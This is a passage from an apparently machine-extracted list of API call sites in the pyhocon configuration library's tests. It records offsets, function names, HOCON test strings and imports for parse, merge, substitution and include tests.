(['"""\n b1 : { v1: 2, v2: 3 }\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 2, v2: 3 }\n """, resolve=False)\n', (54570, 54645), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54692, 54734), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54716, 54734), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54743, 54785), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54777, 54785), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55014, 55089), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = { x: 1 }\n """'], {}), '("""\n dict = { x: 1 }\n """)\n', (55040, 55089), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55130, 55233), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = ${dict} { y: 2 }\n """'], {'resolve': '(False)'}), '(\n """\n dict = ${dict} { y: 2 }\n """, resolve=False)\n', (55156, 55233), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55452, 55524), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = abc\n """'], {}), '("""\n string = abc\n """)\n', (55478, 55524), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55565, 55666), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = ${string}def\n """'], {'resolve': '(False)'}), '(\n """\n string = ${string}def\n """, resolve=False)\n', (55591, 55666), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56001, 56093), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 1\n mid.b = 1\n """'], {}), '(\n """\n a = 1\n mid.b = 1\n """)\n', (56027, 56093), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56289, 56517), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """'], {}), '(\n """\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """\n )\n', (56315, 56517), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56918, 57050), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """'], {}), '(\n """\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """\n )\n', (56944, 57050), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57235, 57431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """'], {}), '(\n """\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """\n )\n', (57261, 57431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57726, 57822), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test = line1 line2\ntest2 = test\n """'], {}), '(\n """\n test = line1 line2\ntest2 = test\n """)\n', (57752, 57822), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58113, 58139), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58136, 58139), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58228, 58241), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58239, 58241), False, 'from collections import OrderedDict\n'), ((58352, 58378), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58375, 58378), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58466, 58479), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58477, 58479), False, 'from collections import OrderedDict\n'), ((58657, 58683), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58680, 58683), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58763, 59090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """'], {}), '(\n """o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """\n )\n', (58789, 59090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59446, 59656), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """'], {}), '(\n """base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """\n )\n', (59472, 59656), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59892, 59996), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (59918, 59996), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60649, 60721), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo bar\n """'], {}), '("""\n a = foo bar\n """)\n', (60675, 60721), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60871, 60958), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo "bar" dummy\n """'], {}), '(\n """\n a = foo "bar" dummy\n """)\n', (60897, 60958), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61125, 61348), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """'], {}), '(\n """\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """\n )\n', (61151, 61348), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61625, 61870), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """'], {'resolve': '(True)'}), '(\n """\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """\n , resolve=True)\n', (61651, 61870), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62119, 62246), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = // abc\n abc\n\n c =\n 5\n """'], {}), '(\n """\n a = // abc\n abc\n\n c =\n 5\n """\n )\n', (62145, 62246), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62463, 62559), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string_from_env = ${STRING_VAR}\n """'], {}), '(\n """\n string_from_env = ${STRING_VAR}\n """)\n', (62489, 62559), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62802, 62893), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${STRING_VAR}\n """)\n', (62828, 62893), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63140, 63232), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${?STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${?STRING_VAR}\n """)\n', (63166, 63232), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63445, 63542), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bool_from_env = ${TRUE_OR_FALSE}\n """'], {}), '(\n """\n bool_from_env = ${TRUE_OR_FALSE}\n """)\n', (63471, 63542), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63787, 63877), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n int_from_env = ${INT_VAR}\n """'], {}), '(\n """\n int_from_env = ${INT_VAR}\n """)\n', (63813, 63877), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((64234, 64274), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['input_string'], {}), '(input_string)\n', (64260, 64274), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65200, 65329), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""'], {}), '(\n """\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""\n )\n', (65226, 65329), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65476, 65527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:[""\\"foo""\\"", "bar"]"""'], {}), '(\'a:["""foo"""", "bar"]\')\n', (65502, 65527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65650, 65694), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:{b: 3, d: 6}"""'], {}), "('a:{b: 3, d: 6}')\n", (65676, 65694), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66063, 66210), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """'], {}), '(\n """\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """\n )\n', (66089, 66210), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66355, 66480), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: {\n pb: 5\n }\n """'], {}), '(\n """\n a: 1\n b: {\n pb: 5\n }\n """\n )\n', (66381, 66480), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66567, 66690), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """'], {}), '(\n """\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """\n )\n', (66593, 66690), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66847, 66979), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """'], {}), '(\n """\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """\n )\n', (66873, 66979), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67121, 67265), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """'], {}), '(\n """\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """\n )\n', (67147, 67265), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67455, 68030), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """'], {}), '(\n """\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """\n )\n', (67481, 68030), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((68954, 68988), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['source'], {}), '(source)\n', (68980, 68988), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((69762, 69801), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (69788, 69801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2231, 2264), 'pytest.raises', 'pytest.raises', (['ParseBaseException'], {}), '(ParseBaseException)\n', (2244, 2264), False, 'import pytest\n'), ((2496, 2525), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (2509, 2525), False, 'import pytest\n'), ((5331, 5347), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5337, 5347), True, 'from datetime import timedelta as period\n'), ((9465, 9502), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (9478, 9502), False, 'import pytest\n'), ((11308, 11347), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11321, 11347), False, 'import pytest\n'), ((11361, 11402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = [4] "4\\""""'], {}), '(\'a = [4] "4"\')\n', (11387, 11402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11416, 11455), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11429, 11455), False, 'import pytest\n'), ((11469, 11510), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = "4" [5]"""'], {}), '(\'a = "4" [5]\')\n', (11495, 11510), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11524, 11563), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11537, 11563), False, 'import pytest\n'), ((11577, 11621), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {b: 5} "4\\""""'], {}), '(\'a = {b: 5} "4"\')\n', (11603, 11621), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21736, 21778), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21749, 21778), False, 'import pytest\n'), ((21792, 21906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent}\n """'], {}), '(\n """\n common_modules = ${non_existent}\n """\n )\n', (21818, 21906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21941, 21983), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21954, 21983), False, 'import pytest\n'), ((21997, 22115), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent}\n """'], {}), '(\n """\n common_modules = abc ${non_existent}\n """\n )\n', (22023, 22115), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22150, 22192), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22163, 22192), False, 'import pytest\n'), ((22206, 22324), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent} abc\n """'], {}), '(\n """\n common_modules = ${non_existent} abc\n """\n )\n', (22232, 22324), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22359, 22401), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22372, 22401), False, 'import pytest\n'), ((22415, 22537), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent} def\n """'], {}), '(\n """\n common_modules = abc ${non_existent} def\n """\n )\n', (22441, 22537), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22620, 22659), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22633, 22659), False, 'import pytest\n'), ((22673, 22834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """\n )\n', (22699, 22834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22869, 22908), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22882, 22908), False, 'import pytest\n'), ((22922, 23083), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """\n )\n', (22948, 23083), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23118, 23157), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23131, 23157), False, 'import pytest\n'), ((23171, 23335), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23197, 23335), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23370, 23409), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23383, 23409), False, 'import pytest\n'), ((23423, 23584), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """\n )\n', (23449, 23584), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23619, 23658), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23632, 23658), False, 'import pytest\n'), ((23672, 23833), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """\n )\n', (23698, 23833), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23868, 23907), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23881, 23907), False, 'import pytest\n'), ((23921, 24085), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23947, 24085), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27276, 27318), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27289, 27318), False, 'import pytest\n'), ((27332, 27408), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n """'], {}), '("""\n x = ${x}\n """)\n', (27358, 27408), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27509, 27551), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27522, 27551), False, 'import pytest\n'), ((27565, 27671), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n x = ${x}\n """'], {}), '(\n """\n x = ${x}\n x = ${x}\n """)\n', (27591, 27671), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29914, 29956), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (29927, 29956), False, 'import pytest\n'), ((29970, 30090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x} {y: 1}\n x = ${x.y}\n """'], {}), '(\n """\n x = ${x} {y: 1}\n x = ${x.y}\n """\n )\n', (29996, 30090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34625, 34660), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34638, 34660), False, 'import pytest\n'), ((34674, 34725), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules [perl]"""'], {}), "('common_modules [perl]')\n", (34700, 34725), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34740, 34769), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (34753, 34769), False, 'import pytest\n'), ((34783, 34840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules {} {perl: 1}"""'], {}), "('common_modules {} {perl: 1}')\n", (34809, 34840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34855, 34890), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34868, 34890), False, 'import pytest\n'), ((34904, 35038), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """'], {}), '(\n """\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """\n )\n', (34930, 35038), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35093, 35128), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35106, 35128), False, 'import pytest\n'), ((35142, 35290), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n f: 5\n g\n }\n """'], {}), '(\n """\n a = {\n f: 5\n g\n }\n """\n )\n', (35168, 35290), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35312, 35347), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35325, 35347), False, 'import pytest\n'), ((35361, 35398), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {g}"""'], {}), "('a = {g}')\n", (35387, 35398), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35446, 35478), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (35473, 35478), False, 'import tempfile\n'), ((37355, 37377), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (37368, 37377), False, 'import pytest\n'), ((37391, 37585), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """\n )\n', (37417, 37585), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37823, 37848), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (37836, 37848), False, 'import pytest\n'), ((37862, 37923), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon/config_parser.py"""'], {}), "('pyhocon/config_parser.py')\n", (37895, 37923), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37987, 38013), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (38000, 38013), False, 'import pytest\n'), ((38027, 38090), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""non_existent_module:foo.py"""'], {}), "('non_existent_module:foo.py')\n", (38060, 38090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((38222, 38257), 'os.path.join', 'os.path.join', (['temp_dir', '"""my_module"""'], {}), "(temp_dir, 'my_module')\n", (38234, 38257), False, 'import os\n'), ((38284, 38319), 'os.path.join', 'os.path.join', (['module_dir', '"""my.conf"""'], {}), "(module_dir, 'my.conf')\n", (38296, 38319), False, 'import os\n'), ((38413, 38433), 'os.mkdir', 'os.mkdir', (['module_dir'], {}), '(module_dir)\n', (38421, 38433), False, 'import os\n'), ((38824, 38980), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: 2\n include package("my_module:my.conf")\n """'], {}), '(\n """\n a: 1\n b: 2\n include package("my_module:my.conf")\n """\n )\n', (38850, 38980), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((39187, 39230), 'shutil.rmtree', 'shutil.rmtree', (['temp_dir'], {'ignore_errors': '(True)'}), '(temp_dir, ignore_errors=True)\n', (39200, 39230), False, 'import shutil\n'), ((39392, 39424), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (39419, 39424), False, 'import tempfile\n'), ((40489, 40521), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40516, 40521), False, 'import tempfile\n'), ((40935, 40967), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40962, 40967), False, 'import tempfile\n'), ((41071, 41276), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['("""\n {\n a : { include """ + \'"\' + fdin.\n name +\n """" }\n a : { x : 42 }\n }\n """\n )'], {}), '(\n """\n {\n a : { include """ + \'"\' +\n fdin.name +\n """" }\n a : { x : 42 }\n }\n """\n )\n', (41097, 41276), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45051, 45093), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (45064, 45093), False, 'import pytest\n'), ((45107, 45243), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${b}\n b = ${c}\n c = ${a}\n """'], {}), '(\n """\n a = ${b}\n b = ${c}\n c = ${a}\n """\n )\n', (45133, 45243), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60039, 60069), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (60052, 60069), False, 'import pytest\n'), ((64449, 64488), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), 